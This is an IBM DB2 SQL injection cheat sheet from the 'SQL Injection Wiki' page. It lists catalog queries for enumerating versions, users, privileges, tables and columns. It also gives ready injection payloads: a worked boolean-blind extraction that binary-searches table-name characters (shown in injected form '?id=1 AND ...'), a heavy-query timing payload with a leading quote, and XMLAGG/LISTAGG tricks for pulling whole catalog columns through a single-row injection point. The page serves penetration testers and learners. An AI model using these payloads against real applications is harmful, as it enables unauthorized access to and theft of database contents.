The SQL Injection Wiki project aims to document SQL Injection in full detail. It is a good reference both for seasoned web security professionals and for those who are just starting. The project website is updated frequently and currently includes detailed documentation of SQL Injection attack variants for the databases listed below:

The SQL Injection Wiki is sponsored by Netsparker, an automated false positive free web vulnerability scanner. Download a free trial.

IBM DB2 SQL Injection Cheat Sheet

  • SELECT service_level FROM table(sysproc.env_get_inst_info()) as instanceinfo
  • SELECT getvariable('sysibm.version') FROM sysibm.sysdummy1 -- (v8+)
  • SELECT prod_release, installed_prod_fullname FROM table(sysproc.env_get_prod_info()) as productinfo
  • SELECT service_level,bld_level FROM sysibmadm.env_inst_info

Back to top

  • SELECT blah FROM foo -- comment like this (double dash)

Back to top

  • SELECT user FROM sysibm.sysdummy1
  • SELECT session_user FROM sysibm.sysdummy1
  • SELECT system_user FROM sysibm.sysdummy1

Back to top

DB2 has no database-level user accounts: authentication is delegated to the operating system (or a security plug-in), and the catalog only records the authorization IDs that have been granted something. Those with DB2 access can be retrieved with:
  • SELECT distinct(authid) FROM sysibmadm.privileges -- priv required
  • SELECT grantee FROM syscat.dbauth -- incomplete results
  • SELECT distinct(definer) FROM syscat.schemata -- more accurate
  • SELECT distinct(grantee) FROM sysibm.systabauth -- same as previous

Back to top

N/A: DB2 stores no password hashes. Passwords belong to the OS user accounts (or the security plug-in) that DB2 authenticates against.

Back to top

  • SELECT * FROM syscat.tabauth -- shows priv on tables
  • SELECT * FROM syscat.tabauth where grantee = current user -- shows privs for current user

Back to top

  • SELECT distinct(grantee) FROM sysibm.systabauth where CONTROLAUTH='Y' -- authorization IDs holding CONTROL privilege on at least one table

Back to top

  • SELECT current server FROM sysibm.sysdummy1

Back to top

  • SELECT distinct(table_catalog) FROM sysibm.tables

Back to top

  • SELECT name, tbname, coltype FROM sysibm.syscolumns -- the same information is also exposed through the SYSCAT.COLUMNS view (as COLNAME, TABNAME, TYPENAME) and through SYSSTAT.COLUMNS

Back to top

  • SELECT table_name FROM sysibm.tables
  • SELECT name FROM sysibm.systables

Back to top

  • SELECT tbname FROM sysibm.syscolumns WHERE name='username'

Back to top

  • SELECT name FROM (SELECT * FROM sysibm.systables ORDER BY name ASC fetch first N rows only) ORDER BY name DESC fetch first row only

Back to top

  • SELECT substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b

Back to top

  • SELECT bitand(1,0) FROM sysibm.sysdummy1 -- returns 0

Also available bitandnot, bitor, bitxor, bitnot.

Back to top

  • SELECT chr(65) FROM sysibm.sysdummy1 -- returns 'A'

Back to top

  • SELECT ascii('A') FROM sysibm.sysdummy1 -- returns 65

Back to top

  • SELECT cast('123' as integer) FROM sysibm.sysdummy1
  • SELECT cast(1 as char) FROM sysibm.sysdummy1

Back to top

  • SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1 -- returns 'abc'
  • SELECT 'a' || 'b' FROM sysibm.sysdummy1 -- returns 'ab'

Back to top

The IF statement is SQL PL and is only accepted in procedural contexts (stored procedures, functions, compound statements), not in a plain query. Use CASE logic instead.

Back to top

  • SELECT CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END FROM sysibm.sysdummy1
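
The Nth-row, Nth-char, char-to-ASCII and CASE primitives above compose into a single true/false test that is all a boolean-blind injection needs. The following is an added example, not code from the original page; it assumes (not stated on the page) a numeric parameter inside a WHERE clause and an application that renders a visibly different page when that clause is false. The alias names firstn and nthrow are arbitrary.

```sql
-- Added example, not from the original page: boolean-blind extraction of one
-- character of one table name, built from the Nth-row, Nth-char, ASCII and
-- CASE primitives of this cheat sheet. Assumption (not on the page): the
-- application has a numeric parameter inside a WHERE clause and shows a
-- different page when that clause is false. Aliases firstn/nthrow are arbitrary.

-- Step 1: the 5th table name in alphabetical order (the Nth-row query, N = 5).
SELECT name
FROM (SELECT * FROM sysibm.systables ORDER BY name ASC FETCH FIRST 5 ROWS ONLY) AS firstn
ORDER BY name DESC FETCH FIRST 1 ROW ONLY;

-- Step 2: "is the 3rd character of that name above 'M' (ASCII 77)?" as a predicate.
-- Comparing with > instead of = allows a binary search over 0..127, i.e. at most
-- 7 requests per character instead of one request per candidate value.
-- Injected form:  ?id=1 AND 77 < (SELECT ascii(substr(name,3,1)) FROM ( ... ) AS nthrow)
SELECT 1
FROM sysibm.sysdummy1
WHERE 77 < (
  SELECT ascii(substr(name, 3, 1))
  FROM (SELECT name
        FROM (SELECT * FROM sysibm.systables ORDER BY name ASC FETCH FIRST 5 ROWS ONLY) AS firstn
        ORDER BY name DESC FETCH FIRST 1 ROW ONLY) AS nthrow
);

-- Step 3: the same test as a CASE expression, for injection points that sit in a
-- SELECT list or ORDER BY clause rather than in a WHERE clause.
SELECT CASE
         WHEN 77 < (SELECT ascii(substr(name, 3, 1))
                    FROM (SELECT name
                          FROM (SELECT * FROM sysibm.systables ORDER BY name ASC FETCH FIRST 5 ROWS ONLY) AS firstn
                          ORDER BY name DESC FETCH FIRST 1 ROW ONLY) AS nthrow)
         THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB'
       END
FROM sysibm.sysdummy1;
```

Walk N over the row count and the character position over the name length, narrowing the ASCII range with each true/false answer; the same skeleton works for any other catalog column (syscat.columns, syscat.dbauth) by swapping the inner query.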

Back to top

  • SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns 'ADRI'

The chr() chain is an ordinary expression, so it also works without a SELECT, for example on either side of a comparison in an injected WHERE clause.

Back to top

Heavy queries, for example:

  • ' and (SELECT count(*) FROM sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (SELECT ascii(substr(user,1,1)) FROM sysibm.sysdummy1)=68

If the first character of user is ASCII 68 ('D'), the heavy subquery (a triple Cartesian product of sysibm.columns) has to be evaluated and the response is delayed; if it is not, the conjunction is already false and the response comes back quickly. This relies on the optimizer evaluating the cheap predicate first and skipping the rest, which DB2 does not guarantee, so time both outcomes on the target before trusting the difference.

Back to top

  • SELECT xmlagg(xmlrow(table_schema)) FROM sysibm.tables -- returns all rows in one xml-formatted string, useful when the injection point only displays a single row
  • SELECT xmlagg(xmlrow(table_schema)) FROM (SELECT distinct(table_schema) FROM sysibm.tables) -- same but without repeated elements
  • SELECT xml2clob(xmlagg(xmlelement(name t, table_schema))) FROM sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
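
On DB2 9 and later the XML2CLOB form is superseded by XMLSERIALIZE, and from 9.7 LISTAGG gives a plain delimited string with no XML tags at all. The following added example (not from the original page) shows both ways of pulling a whole catalog column through a single-row injection point; it assumes DB2 LUW 9.1 or later for XMLSERIALIZE and 9.7 or later for LISTAGG, and the schema name 'SYSCAT' is only a sample filter.

```sql
-- Added example, not from the original page: every table name of one schema
-- returned as a single string. Assumptions (not on the page): DB2 LUW 9.1+
-- for XMLSERIALIZE, 9.7+ for LISTAGG; 'SYSCAT' is just a sample schema filter.

-- XML form: ORDER BY inside XMLAGG makes the output deterministic, and
-- XMLSERIALIZE converts the XML value to VARCHAR so the application can print it.
SELECT XMLSERIALIZE(
         CONTENT XMLAGG(XMLELEMENT(NAME "t", tabname) ORDER BY tabname)
         AS VARCHAR(4000)
       )
FROM syscat.tables
WHERE tabschema = 'SYSCAT';

-- Delimited form (9.7+): same information as the page's distinct-schema query,
-- but comma separated rather than wrapped in <row>/<t> elements.
SELECT LISTAGG(tabschema, ',') WITHIN GROUP (ORDER BY tabschema)
FROM (SELECT DISTINCT tabschema FROM syscat.tables) AS s;
```

Keep the VARCHAR length below what the application truncates at; if the aggregate is longer, filter with a WHERE clause or a FETCH FIRST on the inner query and page through the result.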

Back to top

N/A

Back to top

Seems it’s only allowed from procedures or UDFs.

Back to top

I think this is only available through stored procedures or a DB2 tool.

Back to top

  • SELECT os_name,os_version,os_release,host_name FROM sysibmadm.env_sys_info -- requires priv

Back to top

  • SELECT * FROM sysibmadm.reg_variables WHERE reg_var_name='DB2PATH' -- requires priv

Back to top

  • SELECT dbpartitionnum, name, value FROM sysibmadm.dbcfg where name like 'auto_%' -- Requires priv.
Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.

  • SELECT name, deferred_value, dbpartitionnum FROM sysibmadm.dbcfg -- Requires priv. 
Retrieve all the database configuration parameters values stored on disk for all database partitions.

Back to top

DB2 has no set of default databases to enumerate (an instance starts out with no databases, and SAMPLE is optional), so what is worth knowing are the default system schemas (and their tables):

  • SYSIBM
  • SYSCAT
  • SYSSTAT
  • SYSPUBLIC
  • SYSIBMADM
  • SYSTOOLS

Back to top